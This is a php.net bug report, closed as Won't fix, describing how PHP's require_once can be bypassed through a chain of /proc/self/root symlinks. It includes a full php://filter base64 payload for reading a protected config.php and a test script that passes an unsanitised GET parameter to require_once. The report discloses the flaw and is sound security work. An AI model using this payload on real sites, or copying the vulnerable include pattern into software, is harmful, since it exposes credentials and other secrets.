|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2021-03-09 14:26 UTC] cmb@php.net
-Status: Open
+Status: Wont fix
-Assigned To:
+Assigned To: cmb
[2021-03-09 14:26 UTC] cmb@php.net
|
|||||||||||||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Dec 21 17:01:58 2024 UTC |
Description: ------------ Normally, when we include a file via `require_once()` which has included before, PHP will prevent this behavior. But when we set the file path to a symbol link, PHP will be fooled. An example in Test script as follows can demonstrate it. And assume there is some secret in `config.php`. We can pass our payload to `content` query parameter, and then the PHP will resolve the file path to '/proc/24273/root/proc/self/root/var/www/html/config.php'. Eventually, the `require_once` bypassed. We got the base64-encoded content of `config.php`. Payload: php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/config.php Test script: --------------- /* index.php */ <?php error_reporting(E_ALL); require_once('config.php'); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content']; require_once($content); } /* config.php */ <?php $MYSQL_HOST = '127.0.0.1'; $MYSQL_PORT = 3306; $MYSQL_USERNAME = 'admin'; $MYSQL_PASSWORD = 'admin'; Expected result: ---------------- Excepted result is `config.php` cannot be included twice by the recursive symbollink.